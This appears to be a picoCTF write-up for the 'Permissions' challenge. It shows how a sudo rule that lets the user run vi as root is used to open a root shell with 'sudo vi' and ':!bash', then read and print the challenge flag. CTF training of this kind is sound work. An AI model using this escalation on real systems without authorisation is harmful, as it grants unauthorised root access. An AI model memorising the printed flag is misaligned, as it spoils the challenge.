Skip to main content

Permissions

  • Description: Can you read files in the root file?
  • Difficulty: Medium

🔎 Solution

The objective of this challenge is to gain sufficient privileges to access the /root directory.

After connecting to the target, we navigate to / and run ls -la to inspect detailed permissions of files and directories.

picoplayer@challenge:/$ ls -la
total 0
drwxr-xr-x   1 root   root     51 Aug 13 05:35 .
drwxr-xr-x   1 root   root     51 Aug 13 05:35 ..
-rwxr-xr-x   1 root   root      0 Aug 13 05:35 .dockerenv
lrwxrwxrwx   1 root   root      7 Mar  8  2023 bin -> usr/bin
drwxr-xr-x   2 root   root      6 Apr 15  2020 boot
d---------   1 root   root     27 Aug  4  2023 challenge
drwxr-xr-x   5 root   root    340 Aug 13 05:35 dev
drwxr-xr-x   1 root   root     66 Aug 13 05:35 etc
drwxr-xr-x   1 root   root     24 Aug  4  2023 home
lrwxrwxrwx   1 root   root      7 Mar  8  2023 lib -> usr/lib
lrwxrwxrwx   1 root   root      9 Mar  8  2023 lib32 -> usr/lib32
lrwxrwxrwx   1 root   root      9 Mar  8  2023 lib64 -> usr/lib64
lrwxrwxrwx   1 root   root     10 Mar  8  2023 libx32 -> usr/libx32
drwxr-xr-x   2 root   root      6 Mar  8  2023 media
drwxr-xr-x   2 root   root      6 Mar  8  2023 mnt
drwxr-xr-x   2 root   root      6 Mar  8  2023 opt
dr-xr-xr-x 286 nobody nogroup   0 Aug 13 05:35 proc
drwx------   1 root   root     23 Aug  4  2023 root
drwxr-xr-x   1 root   root     54 Aug 13 05:35 run
lrwxrwxrwx   1 root   root      8 Mar  8  2023 sbin -> usr/sbin
drwxr-xr-x   2 root   root      6 Mar  8  2023 srv
dr-xr-xr-x  13 nobody nogroup   0 Aug 13 05:35 sys
drwxrwxrwt   1 root   root      6 Aug  4  2023 tmp
drwxr-xr-x   1 root   root     18 Mar  8  2023 usr
drwxr-xr-x   1 root   root     17 Mar  8  2023 var

The /root directory is owned by root with rwx------ permissions, meaning only the root user can access it, while the group and others have no permissions at all. Since our current user is picoplayer, we cannot enter /root directly.

Checking sudo -l, we find that we are allowed to run /usr/bin/vi as root. This can be leveraged to spawn a root shell.

picoplayer@challenge:/$ sudo -l
Matching Defaults entries for picoplayer on challenge:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User picoplayer may run the following commands on challenge:
    (ALL) /usr/bin/vi

From picoplayer, we execute:

sudo vi

Inside vi, we enter:

:!bash

The :! command in vi allows us to execute arbitrary shell commands. In this case, it drops us into a root shell.

With root privileges, we can now access /root and retrieve the contents of the flag file.

root@challenge:~# ls -la
total 12
drwx------ 1 root root   23 Aug  4  2023 .
drwxr-xr-x 1 root root   51 Aug 13 05:35 ..
-rw-r--r-- 1 root root 3106 Dec  5  2019 .bashrc
-rw-r--r-- 1 root root   35 Aug  4  2023 .flag.txt
-rw-r--r-- 1 root root  161 Dec  5  2019 .profile
root@challenge:~# cat .flag.txt 
picoCTF{uS1ng_v1m_3dit0r_89e9cf1a}

🚩Flag

picoCTF{uS1ng_v1m_3dit0r_89e9cf1a}